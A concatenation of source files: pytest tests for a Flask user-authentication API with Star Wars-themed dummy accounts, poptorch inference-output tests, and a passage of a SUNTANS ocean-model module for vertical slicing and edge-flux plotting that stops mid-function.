                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email=user.email,
        password=password
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    new_password = "iAmVader"

    headers = build_header(access_token)
    response = client.put('/api/user/password', json=dict(
        password=password,
        new_password=new_password
    ), headers=headers, follow_redirects=True)

    assert response.status_code == 200

    user_db = db.session.query(User).filter_by(id=user.id).one_or_none()
    assert user_db.verify_password(new_password)
def test_get_user(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email=user.email,
        password=password
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    headers = build_header(access_token)
    response = client.get('/api/user', headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert response.json['id'] == user.id
    assert response.json['name'] == user.name
    assert response.json['email'] == user.email
    assert user.verify_password(password)
def test_get_user_by_id(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email="luke@luizalabs.com.br",
        password="darthVaderIsMyFather"
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    headers = build_header(access_token)
    response = client.get(f'/api/user/{user.id}', headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert response.json['id'] == user.id
    assert response.json['name'] == user.name
    assert response.json['email'] == user.email
    assert user.verify_password(password)
def test_get_user_by_email(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email="luke@luizalabs.com.br",
        password="darthVaderIsMyFather"
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    headers = build_header(access_token)
    response = client.get(f'/api/user/email/{user.email}', headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert response.json['id'] == user.id
    assert response.json['name'] == user.name
    assert response.json['email'] == user.email
    assert user.verify_password(password)
def test_get_all_user(client, db):
    set_up(db)

    user_1_password = "youAreMyOnlyHope"
    user_2_password = "iKnow"
    user_1 = User(name='Leia Organa', email='leia@luizalabs.com.br',
                  password=generate_password_hash(user_1_password),
                  roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    user_2 = User(name="Han Solo", email="han@starwars.com",
                  password=generate_password_hash(user_2_password))
    db.session.add(user_1)
    db.session.add(user_2)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email="luke@luizalabs.com.br",
        password="darthVaderIsMyFather"
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    headers = build_header(access_token)
    response = client.get(f'/api/user/', headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert len(response.json) == 3

    users = db.session.query(User).all()
    for index, customer in enumerate(response.json, start=0):
        user_db = users[index]
        assert user_db.id == customer['id']
        assert user_db.name == customer['name']
        assert user_db.email == customer['email']

    response = client.get(f'/api/user/1/1', headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert len(response.json) == 1

    users = db.session.query(User).all()
    user_db = users[0]
    user = response.json[0]
    assert user_db.id == user['id']
    assert user_db.name == user['name']
    assert user_db.email == user['email']
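The final request above hits `/api/user/1/1` and expects exactly one user back, i.e. page-based pagination with one item on the first page. The route's real parameter names are not visible in this excerpt, so `page`/`per_page` below are assumptions; the slicing rule itself can be sketched as:

```python
def paginate(items, page, per_page):
    """Return the 1-indexed `page` of `items`, at most `per_page` long."""
    start = (page - 1) * per_page
    return items[start:start + per_page]
```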
# File: ChromProcess/Utils/peak_finding/__init__.py
# Repo: thijsdejong10/ChromProcess (license: BSD-3-Clause)
] | null | null | null | from .pick_peaks import find_peaks
from .pick_peaks import find_peaks_scipy

# File: tests/outputs_test.py
# Repo: NunoEdgarGFlowHub/poptorch (license: MIT)
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import torch.nn as nn
import poptorch
import poptorch.testing
def test_multiple_tensors():
    class Network(nn.Module):
        def forward(self, x, y):
            t1 = (x + y)
            t2 = (t1, x * y)
            return t2[0], y - x, t2[1] + t1

    # Create our model.
    model = Network()
    inference_model = poptorch.inferenceModel(model)

    x = torch.ones(2)
    y = torch.zeros(2)

    ipu = inference_model(x, y)
    ref = model(x, y)
    assert poptorch.testing.allclose(
        ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_simple_list():
    class Network(nn.Module):
        def forward(self, x, y):
            t1 = (x + y)
            t2 = (t1, x * y)
            return [t2[0], y - x, t2[1] + t1]

    # Create our model.
    model = Network()
    inference_model = poptorch.inferenceModel(model)

    x = torch.ones(2)
    y = torch.zeros(2)

    ipu = inference_model(x, y)
    ref = model(x, y)
    assert poptorch.testing.allclose(
        ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_simple_tuple():
    class Network(nn.Module):
        def forward(self, x, y):
            t1 = (x + y)
            t2 = (t1, x * y)
            return (t2[0], y - x, t2[1] + t1)

    # Create our model.
    model = Network()
    inference_model = poptorch.inferenceModel(model)

    x = torch.ones(2)
    y = torch.zeros(2)

    ipu = inference_model(x, y)
    ref = model(x, y)
    assert poptorch.testing.allclose(
        ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_nested_tuples():
    class Network(nn.Module):
        def forward(self, x, y):
            t1 = (x + y)
            t2 = (t1, x * y)
            return x, (t2, y - x, t2[1] + t1), (y, ((t1 * 2.0)))

    # Create our model.
    model = Network()
    inference_model = poptorch.inferenceModel(model)

    x = torch.ones(2)
    y = torch.zeros(2)

    ipu = inference_model(x, y)
    ref = model(x, y)
    assert poptorch.testing.allclose(
        ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
def test_same_tensor():
    class Network(nn.Module):
        def forward(self, x, y):
            t1 = (x + y)
            t2 = (t1, x * y)
            return t1, (t1, t2, t1)

    # Create our model.
    model = Network()
    inference_model = poptorch.inferenceModel(model)

    x = torch.ones(2)
    y = torch.zeros(2)

    ipu = inference_model(x, y)
    ref = model(x, y)
    assert poptorch.testing.allclose(
        ref, ipu), "%s doesn't match the expected output %s" % (ipu, ref)
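Every test above compares CPU and IPU outputs with `poptorch.testing.allclose`, which has to recurse through nested tuple/list outputs such as `(x, (t2, ...), (y, ...))`. A torch-free sketch of that recursion over plain numbers (an illustration, not poptorch's implementation):

```python
import math

def allclose_nested(a, b, tol=1e-6):
    """Recursively compare nested tuples/lists of floats, element-wise."""
    if isinstance(a, (tuple, list)):
        return (isinstance(b, (tuple, list)) and len(a) == len(b)
                and all(allclose_nested(x, y, tol) for x, y in zip(a, b)))
    return math.isclose(a, b, abs_tol=tol)
```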
# File: sfoda/suntans/sunslice.py
# Repo: mrayson/sfoda (license: BSD-2-Clause)
"""
Object for vertical slicing SUNTANS model output
Created on Wed Jul 03 12:29:14 2013
@author: mrayson
"""
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
import matplotlib.animation as animation
from shapely.geometry import LineString, Point
from sfoda.ugrid.hybridgrid import Line
from sfoda.ugrid.hybridgrid import Point as GPoint
from sfoda.ugrid.gridsearch import GridSearch
from .sunpy import Spatial
from .sunpy import unsurf
class Slice(Spatial):
    """
    Suntans vertical slice class
    """

    def __init__(self,ncfile,xpt=None,ypt=None,Npt=100):

        Spatial.__init__(self,ncfile,klayer=[-99])

        # Calculate the horizontal coordinates of the slice
        self.Npt = Npt
        self.nslice = Npt # For compatibility with other slice classes
        if xpt is None or ypt is None:
            self._getXYgraphically()
        else:
            self.xpt=xpt
            self.ypt=ypt
            self._getSliceCoords()

        # Initialise the slice interpolation object
        self._initInterp()
    def __call__(self,variable,tstep,method='nearest'):
        """
        Load the data and interpolate on the slice
        """
        self.tstep=tstep
        try:
            self.Ntslice = len(tstep)
        except:
            tstep=[tstep]
            self.Ntslice = 1

        self.data = self.loadData(variable,method=method)

        return self.data.squeeze()
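`__call__` relies on `len(tstep)` failing for a scalar to decide whether to wrap the time step in a list. That normalisation step in isolation, as a standalone sketch:

```python
def as_step_list(tstep):
    """Wrap a scalar time step in a list; pass sequences through,
    mirroring the try/except in Slice.__call__."""
    try:
        len(tstep)
    except TypeError:
        tstep = [tstep]
    return tstep
```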
    def pcolorslice(self, z, t=0,xaxis='xslice',\
            titlestr=None, bathyoverlay=True, colorbar=True, shading='auto',**kwargs):
        """
        Pcolor plot of the slice

        Returns a handle to the pcolor object and the colorbar
        """
        # Find the colorbar limits if unspecified
        #a=self.data[t,:].squeeze()
        am = np.ma.array (z, mask=np.isnan(self.data))

        if self.clim is None:
            self.clim=[]
            self.clim.append(np.min(am))
            self.clim.append(np.max(am))

        #h1 = plt.pcolor(self[xaxis],self.zslice,am,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
        X,Z = np.meshgrid(self[xaxis], self.zslice)
        h1 = plt.pcolormesh(X, Z, am,vmin=self.clim[0],vmax=self.clim[1],
                shading=shading,**kwargs)
        #h1 = plt.imshow(am,vmin=self.clim[0],vmax=self.clim[1],\
        #    extent=[self[xaxis].min(), self[xaxis].max(),\
        #    -self.z_w[-1], -self.z_w[0]], aspect='auto',\
        #    **kwargs)

        #Overlay the bed
        if bathyoverlay:
            self._overlayBathy(self[xaxis],facecolor=[0.5,0.5,0.5])
            #self._overlayBathy(self[xaxis][0,:],facecolor=[0.5,0.5,0.5])

        # Set labels etc
        plt.xlabel(self._getXlabel(xaxis))
        plt.ylabel('Depth [m]')

        plt.xlim([self[xaxis].min(),self[xaxis].max()])
        plt.ylim([self.hslice.min(),0])

        if colorbar:
            axcb = plt.colorbar(h1)
        else:
            axcb = None

        if titlestr is None:
            title = plt.title(self.__genTitle())
        else:
            title = plt.title(titlestr)

        return h1, axcb, title
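When `clim` is unset, the plotting methods derive it from the minimum and maximum of the NaN-masked array, so missing (dry or below-bed) cells never influence the colour scale. The same rule without numpy, as a small sketch:

```python
import math

def auto_clim(values):
    """Colour limits from the finite values only, as the masked-array
    min/max above does for NaN-masked slice data."""
    finite = [v for v in values if not math.isnan(v)]
    return [min(finite), max(finite)]
```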
    def contourslice(self,z,t=0,xaxis='xslice',clevs=20,titlestr=None,bathyoverlay=True,\
            filled = True, outline = False,colorbar=True,**kwargs):
        """
        Filled-contour plot of the slice

        Returns a handle to the pcolor object and the colorbar
        """
        if not filled:
            outline=True

        #a=self.data[t,:].squeeze()
        am = np.ma.array (z, mask=np.isnan(z))

        # Find the colorbar limits if unspecified
        if self.clim is None:
            self.clim=[]
            self.clim.append(np.min(am))
            self.clim.append(np.max(am))

        klayer,Nkmax = self.get_klayer()

        if type(clevs)==type(1): # is integer
            V = np.linspace(self.clim[0],self.clim[1],clevs)
        else:
            V = clevs

        if filled:
            h1 = plt.contourf(self[xaxis],self.zslice,am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)

        if outline:
            h2 = plt.contour(self[xaxis],self.zslice,am,V,**kwargs)

        #Overlay the bed
        if bathyoverlay:
            self._overlayBathy(self[xaxis][:],facecolor=[0.5,0.5,0.5])

        # Set labels etc
        plt.xlabel(self._getXlabel(xaxis))
        plt.ylabel('Depth [m]')

        plt.xlim([self[xaxis].min(),self[xaxis].max()])
        plt.ylim([self.hslice.min(),0])

        if colorbar and filled:
            axcb = plt.colorbar(h1)

        if titlestr is None:
            plt.title(self.__genTitle())
        else:
            plt.title(titlestr)

        if filled and not outline:
            return h1,
        elif not filled and outline:
            return h2,
        elif filled and outline:
            return h1, h2,
def xtplot(self,zlayer=0,xaxis='xslice',clevs=20,titlestr=None,**kwargs):
"""
x-t contour plot of the sliced variable along vertical layer, 'zlayer'.
zlayer can be:
[0 - Nkmax] - vertical layer number
'seabed' - seabed value
'diff' - top minus bottom difference)
"""
#kbed = np.max(self.Nk[self.cellind]-1,0)
kbed = self.Nk[self.cellind]
if zlayer == 'seabed':
a= self.data[:,kbed,list(range(0,self.Npt))]
zstring = 'seabed'
elif zlayer == 'diff':
atop = self.data[:,0,:]
abot = self.data[:,kbed,list(range(0,self.Npt))]
a = atop - abot
zstring = 'Surface value - seabed value'
else:
a = self.data[:,zlayer,:]
zstring = '%3.1f [m]'%self.z_r[zlayer]
am = np.ma.array (a, mask=np.isnan(a))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
V = np.linspace(self.clim[0],self.clim[1],clevs)
h1 = plt.contourf(self[xaxis][0,:],self.time[self.tstep],am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Time')
axcb = plt.colorbar(h1)
if titlestr is None:
titlestr='%s [%s]\nLayer: %s'%(self.long_name,self.units,zstring)
plt.title(titlestr)
return h1, axcb
def plotslice(self):
"""
Plots the slice location on a map
"""
self.contourf(z=-self.dv,clevs=30,titlestr='',cmap='gist_earth')
plt.plot(self.xslice[0,:],self.yslice[0,:],'m--')
def animate(self,**kwargs):
"""
Animates the slice
"""
# Initialise the plot object
h1, cb, title = self.pcolorslice(**kwargs)
fig = plt.gcf()
ax = fig.gca()
title=ax.set_title("")
def updateScalar(ii):
a=self.data[ii,:].squeeze()
am = np.ma.array (a, mask=np.isnan(a))
h1.set_array(am[am.mask==False])
title.set_text(self.__genTitle(tt=self.tstep[ii]))
return (title,h1)
self.anim = animation.FuncAnimation(fig, updateScalar, frames=len(self.tstep), interval=50, blit=True)
def loadData(self, variable, method='linear'):
"""
Interpolates the data in raw data onto the slice array
"""
tstep = self.tstep
self.Ntslice = len(tstep)
slicedata = np.zeros((self.Ntslice,self.Nkmax,self.Npt))
#if method=='linear':
# cellind3d = np.repeat(self.cellind.reshape((1,self.Npt)),self.Nkmax,axis=0)
# k3d = np.arange(0,self.Nkmax)
# k3d = np.repeat(k3d.reshape((self.Nkmax,1)),self.Npt,axis=1)
for tt in range(self.Ntslice):
if self.Ntslice>1:
print('Slicing data at time-step: %d of %d...'%(tt,self.Ntslice))
self.tstep=[tstep[tt]]
rawdata = Spatial.loadData(self, variable=variable)
for kk in range(self.Nkmax):
if method == 'nearest':
slicedata[tt,kk,:] = rawdata[kk,self.cellind]
elif method == 'linear':
slicedata[tt,kk,:] = self.interpLinear(rawdata[kk,:].squeeze(),self.xslice[0,:],self.yslice[0,:],self.cellind,k=kk)
else:
raise Exception(' unknown interpolation method: %s. Must be "nearest" or "linear"'%method)
mask = self.maskslice.reshape((1,self.Nkmax,self.Npt))
mask = mask==False
mask = mask.repeat(self.Ntslice,axis=0)
slicedata[mask] = np.nan
self.tstep=tstep
return slicedata.squeeze()
def get_klayer(self):
if self.klayer[0]==-99:
klayer=list(range(self.Nkmax))
Nkmax = self.Nkmax
else:
klayer=self.klayer
Nkmax=len(klayer)
return klayer,Nkmax
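# A minimal standalone sketch of the layer-selection convention used by
# get_klayer() above. Assumption: klayer == [-99] is the sentinel meaning
# "all vertical layers"; names here are illustrative, not the class API.

```python
def select_klayer(klayer, nkmax_total):
    """Return (layer indices, layer count) following the -99 sentinel rule."""
    if klayer[0] == -99:
        return list(range(nkmax_total)), nkmax_total
    return list(klayer), len(klayer)
```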
def _initInterp(self):
"""
Initialise the interpolant
Finds the horizontal indices of the slice points and
constructs the 3D mask array
"""
# Find the cell index of each point along the slice
self.Tri = GridSearch(self.xp,self.yp,self.cells)
self.cellind = self.Tri(self.xslice,self.yslice)
klayer,Nkmax = self.get_klayer()
# Construct the 3D coordinate arrays
self.xslice = np.repeat(self.xslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.yslice = np.repeat(self.yslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.distslice = np.repeat(self.distslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.zslice = np.repeat(-self.z_r[klayer].reshape((self.Nkmax,1)),self.Npt,axis=1)
# Construct the mask array
self.calc_mask()
# Get the bathymetry along the slice
self.hslice = -self.dv[self.cellind]
def calc_mask(self):
""" Construct the mask array"""
self.maskslice = np.zeros((self.Nkmax,self.Npt),dtype=bool)
for kk in range(self.Nkmax):
for ii in range(self.Npt):
if kk <= self.Nk[self.cellind[ii]]:
self.maskslice[kk,ii]=True
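# The double loop in calc_mask() can be vectorised with broadcasting. A
# hedged numpy sketch, assuming Nk holds the deepest wet layer index per
# slice point (function name is illustrative):

```python
import numpy as np

def water_column_mask(Nk, Nkmax):
    """True where layer kk lies at or above the deepest wet layer of the
    cell, mirroring the kk <= Nk[cellind[ii]] test above."""
    kk = np.arange(Nkmax)[:, None]           # (Nkmax, 1) layer indices
    return kk <= np.asarray(Nk)[None, :]     # broadcast to (Nkmax, Npt)
```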
def _getSliceCoords(self,kind=3):
"""
Fits a spline through the input slice points
# Kind is the linear interpolation type
"""
n = self.xpt.shape[0]
t = np.linspace(0,1,n)
tnew = np.linspace(0,1,self.Npt)
if n <= 3:
kind='linear' # a cubic spline needs more than 3 points
Fx = interp1d(t,self.xpt,kind=kind)
Fy = interp1d(t,self.ypt,kind=kind)
self.xslice = Fx(tnew)
self.yslice = Fy(tnew)
self._getDistCoords()
def _getDistCoords(self):
# Calculate the distance along the slice
self.distslice = np.zeros_like(self.xslice)
self.distslice[1:] = np.sqrt( (self.xslice[1:]-self.xslice[:-1]) **2 + \
(self.yslice[1:]-self.yslice[:-1]) **2 )
self.distslice = self.distslice.cumsum()
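# The along-track distance computed in _getDistCoords() as a
# self-contained helper (same sqrt-of-differences/cumsum recipe):

```python
import numpy as np

def dist_along(x, y):
    """Cumulative along-track distance of the polyline (x, y)."""
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    d = np.zeros_like(x)
    d[1:] = np.hypot(np.diff(x), np.diff(y))
    return d.cumsum()
```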
def _getXYgraphically(self):
"""
Plot a map of the bathymetry and graphically select the slice points
"""
self.contourf(z=-self.dv,clevs=30,titlestr='Select points for slice on map\nRight-click to finish; middle-click to remove last point.',cmap='gist_earth')
x = plt.ginput(n=0,timeout=0,mouse_pop=2,mouse_stop=3)
# Find the location of the slice
xy = np.array(x)
self.xpt=xy[:,0]
self.ypt=xy[:,1]
self._getSliceCoords()
plt.plot(self.xslice,self.yslice,'m--')
plt.title('Close figure to continue...')
plt.show()
def _getXlabel(self,xaxis):
if xaxis == 'xslice':
xlab = 'Easting [m]'
elif xaxis == 'yslice':
xlab = 'Northing [m]'
elif xaxis == 'distslice':
xlab = 'Distance along transect [m]'
else:
raise Exception('unknown "xaxis" value "%s".\nMust be one of "xslice", "yslice" or "distslice".'%xaxis)
return xlab
def _overlayBathy(self,xdata,**kwargs):
"""
Pretty bathymetry overlay
"""
plt.fill_between(xdata,self.hslice,y2=self.hslice.min(),zorder=1e6,**kwargs)
def __genTitle(self,tt=None):
if tt is None:
if type(self.tstep)==int:
tt = self.tstep
else:
tt = self.tstep[0]
titlestr='%s [%s]\nTime: %s'%(self.long_name,self.units,\
datetime.strftime(self.time[tt],'%d-%b-%Y %H:%M:%S'))
return titlestr
class SliceEdge(Slice):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
edgemethod=1
abortedge=False
def __init__(self,ncfile,xpt=None,ypt=None,klayer=[-99],\
MAXITER=10000, Npt=100, **kwargs):
self.Npt=Npt
self.MAXITER=MAXITER
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpt,ypt):
"""
Updates the x and y coordinate info in the object
"""
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
self.j,self.nodelist =\
self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[self.nodelist]
self.yslice=self.yp[self.nodelist]
self.zslice = -self.z_r
self._getDistCoords()
self.edgexy()
# The x and y arrays need to be resized
self.xslice = 0.5*(self.xslice[1:]+self.xslice[0:-1])
self.yslice = 0.5*(self.yslice[1:]+self.yslice[0:-1])
self.distslice = 0.5*(self.distslice[1:]+self.distslice[0:-1])
# Get the mask
self.calc_mask()
# Calculate the area
self.area = self.calc_area()
# Calculate the normal
self.ne1, self.ne2, self.enormal = self.calc_normal(self.nodelist,self.j)
# Get the bathymetry along the slice
de = self.get_edgevar(self.dv)
self.hslice = -de[self.j]
def loadData(self,variable=None,setunits=True,method='mean'):
"""
Load the specified suntans variable data as a vector
Overloaded method for edge slicing - it is quicker to load time step by
time step in a loop.
method: edge interpolation method - 'mean', 'max'
"""
nc = self.nc
if variable is None:
variable=self.variable
if setunits:
try:
self.long_name = nc.variables[variable].long_name
self.units= nc.variables[variable].units
except (KeyError, AttributeError):
self.long_name = ''
self.units=''
j=self.j
# Check if cell-centered variable
is3D=True
isCell=False
if self.hasVar(variable):
if self.hasDim(variable,self.griddims['Ne']):
isCell=False
elif self.hasDim(variable,self.griddims['Nc']):
isCell=True
# Check if 3D
if self.hasDim(variable,self.griddims['Nk']) or\
self.hasDim(variable,'Nkw'): # 3D
is3D=True
else:
is3D=False
else:
isCell=True
if isCell:
nc1 = self.grad[j,0].copy()
nc2 = self.grad[j,1].copy()
# check for edges (use logical indexing)
ind1 = nc1==-1
nc1[ind1]=nc2[ind1]
ind2 = nc2==-1
nc2[ind2]=nc1[ind2]
klayer,Nkmax = self.get_klayer()
# N.B. this check crashes for derived variables (e.g. 'area') that are not in the file
if self.hasDim(variable,'Nkw'): # vertical velocity
Nkmax +=1
def ncload(nc,variable,tt):
if variable=='agemean':
ac = nc.variables['agec'][tt,klayer,:]
aa = nc.variables['agealpha'][tt,klayer,:]
tmp = aa/ac
tmp[ac<1e-12]=0.
return tmp/86400.
if variable=='area':
eta = nc.variables['eta'][tt,:]
dzf = Spatial.getdzf(self, eta)
return self.df*dzf
else:
if nc.variables[variable].ndim==1:
return nc.variables[variable][:]
elif self.hasDim(variable,self.griddims['Nk']): # 3D
return nc.variables[variable][tt,klayer,:]
else:
return nc.variables[variable][tt,:]
# For loop where the data is extracted
nt = len(self.tstep)
ne = len(self.j)
if is3D:
self.data = np.zeros((nt,Nkmax,ne))
else:
self.data = np.zeros((nt,ne))
for ii,tt in enumerate(self.tstep):
#tmp=nc.variables[variable][tt,:,:]
tmp = ncload(nc,variable,tt)
# Return the mean for cell-based variables
if isCell:
if method == 'mean':
self.data[ii,...] = 0.5*(tmp[...,nc1]+tmp[...,nc2])
elif method == 'max':
tmp2 = np.dstack((tmp[...,nc1], tmp[...,nc2]))
self.data[ii,...] =tmp2.max(axis=-1)
else:
self.data[ii,...]=tmp[...,self.j]
# Average 'w'
if self.hasDim(variable,'Nkw'):
self.data = self.data[:,1:]*0.5 + self.data[:,0:-1]*0.5
# Mask 3D data
if is3D:
maskval=0
self.data[ii,self.maskslice]=maskval
#fillval = 999999.0
#self.mask = self.data==fillval
#self.data[self.mask]=0.
self.data[self.data==self._FillValue]=0.
self.data = self.data.squeeze()
return self.data
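# The boundary-safe cell-to-edge averaging used above (method='mean') as a
# standalone sketch. Assumption: grad holds the two neighbouring cell
# indices of each edge, with -1 marking a missing (boundary) neighbour.

```python
import numpy as np

def edge_mean(cell_vals, grad):
    """Average a cell variable onto edges; boundary edges reuse the
    interior neighbour on both sides (mirrors the nc1/nc2 logic)."""
    nc1 = grad[:, 0].copy()   # copy so -1 substitution leaves the grid intact
    nc2 = grad[:, 1].copy()
    nc1[nc1 == -1] = nc2[nc1 == -1]
    nc2[nc2 == -1] = nc1[nc2 == -1]
    return 0.5 * (cell_vals[..., nc1] + cell_vals[..., nc2])
```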
def edgexy(self):
"""
Nx2 vectors outlining each cell in the edge slice
"""
def closePoly(xp,node,k):
return np.array([ [xp[node],\
xp[node+1],xp[node+1], xp[node],xp[node]],\
[-self.z_w[k],-self.z_w[k],-self.z_w[k+1],-self.z_w[k+1],-self.z_w[k]],\
]).T
self.xye = [closePoly(self.distslice,jj,kk) for kk in range(self.Nkmax) \
for jj in range(len(self.j)) ]
def calc_normal(self,nodelist,j):
"""
Calculate the edge normal
"""
# Calculate the unit normal along the edge
P1 = GPoint(self.xp[nodelist][0:-1],self.yp[nodelist][0:-1])
P2 = GPoint(self.xp[nodelist][1:],self.yp[nodelist][1:])
L = Line(P1,P2)
ne1,ne2 = L.unitnormal()
# Compute the unique normal of the dot product
enormal = np.round(self.n1[j]*ne1 +\
self.n2[j]*ne2)
return ne1,ne2,enormal
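# A minimal sketch of the per-segment unit normal that calc_normal()
# obtains from the Line helper, assuming a +90-degree (left-hand) rotation
# of the segment direction; the function name is illustrative.

```python
import numpy as np

def segment_unit_normal(x1, y1, x2, y2):
    """Unit normal of the segment (x1,y1)->(x2,y2), rotated +90 degrees
    from the segment direction."""
    dx, dy = x2 - x1, y2 - y1
    length = np.hypot(dx, dy)
    return -dy / length, dx / length
```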
def mean(self,phi,axis='time'):
"""
Calculate the mean of the sliced data along an axis
axis: time, depth, area
time : returns the time mean. size= (Nk, Nj)
depth: returns the time and spatial mean. Size = (Nk)
area: returns the area mean. Size = (Nt)
"""
if axis=='time':
return np.mean(phi,axis=0)
elif axis=='area':
area_norm = self.area / self.area.sum()
return np.sum( np.sum(phi*area_norm,axis=-1),axis=-1)
elif axis=='depth':
dx = self.df[self.j]
dx_norm = dx / dx.sum()
return np.sum( self.mean(phi,axis='time')*dx_norm,axis=-1)
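# The 'area' branch above normalises by total cross-sectional area before
# summing. A standalone sketch of that weighting (assumed axis layout:
# phi is (Nt, Nk, Ne), area is (Nk, Ne)):

```python
import numpy as np

def area_weighted_mean(phi, area):
    """Area-weighted mean over the last two axes (layers, edges),
    one value per remaining leading axis (e.g. time)."""
    w = area / area.sum()
    return (phi * w).sum(axis=(-2, -1))
```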
def plot(self,z,titlestr=None,**kwargs):
"""
Pcolor plot of the slice
"""
if self.clim is None:
self.clim=[]
self.clim.append(np.min(z))
self.clim.append(np.max(z))
# Set the xy limits
xlims=[self.distslice.min(),self.distslice.max()]
ylims=[-self.z_w.max(),-self.z_w.min()]
self.fig,self.ax,self.patches,self.cb=unsurf(self.xye,z.ravel(),xlim=xlims,ylim=ylims,\
clim=self.clim,**kwargs)
self.ax.set_aspect('auto')
def plotedges(self,color='m',**kwargs):
"""
plot for testing
"""
self.plotmesh()
#plt.plot(self.edgeline.xy,'r')
for ee in self.j:
plt.plot([self.xp[self.edges[ee,0]],self.xp[self.edges[ee,1]]],\
[self.yp[self.edges[ee,0]],self.yp[self.edges[ee,1]]],color=color,\
**kwargs)
def calc_area(self,eta=None):
"""
Calculate the cross-sectional area of each face
"""
if eta is None:
eta = np.zeros((self.nslice,)) # Assumes the free-surface is zero
dzf = self.getdzf(eta)
area = dzf * self.df[self.j]
area[self.maskslice]=0
return area
def getdzf(self,eta):
""" Get the cell thickness along each edge of the slice"""
#dzf = Spatial.getdzf(self,eta,j=self.j)
dzf = np.repeat(self.dz[:,np.newaxis],len(self.j), axis=1)
dzf[self.maskslice]=0
return dzf
def get_width(self):
"""
Calculate the width of each edge as a 2d array
Missing cells are masked
"""
df = self.df[self.j]
width = np.ones((self.Nkmax,1)) * df[np.newaxis,:]
width[self.maskslice]=0
return width
def calc_mask(self):
""" Construct the mask array"""
klayer,Nkmax=self.get_klayer()
self.maskslice = np.zeros((Nkmax,len(self.j)),dtype=bool)
for k,kk in enumerate(klayer):
for ii,j in enumerate(self.j):
if kk >= self.Nke[j]:
self.maskslice[k,ii]=True
def get_edgeindices(self,xpt,ypt,method=1, abortedge=True):
"""
Return the indices of the edges (in order) along the line
method - method for line finding algorithm
0 - closest point to line
1 - closest point without doing a u-turn
abortedge - Set true to abort when slice hits a boundary
"""
# Load the line as a shapely object
#edgeline = asLineString([self.xslice,self.yslice])
Npt = xpt.shape[0]
xyline = [(xpt[ii],ypt[ii]) for ii in range(Npt)]
self.edgeline = LineString(xyline)
# Find the nearest grid Node to the start and end of the line
xy_1 = np.vstack((xpt[0],ypt[0])).T
node0 = self.grd.findnearest(xy_1)
xy_2 = np.vstack((xpt[-1],ypt[-1])).T
endnode = self.grd.findnearest(xy_2)
# This is the list containing all edge nodes
nodelist = [node0[0]]
def connecting_nodes(node,nodelist):
""" finds the nodes connecting to the node"""
edges = self.grd.pnt2edges(node)
cnodes = []
for ee in edges:
for nn in self.grd.edges[ee]:
if nn not in nodelist:
cnodes.append(nn)
return cnodes
def min_dist(nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((self.xp[nn],self.yp[nn])) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_line(cnode,nodes,line):
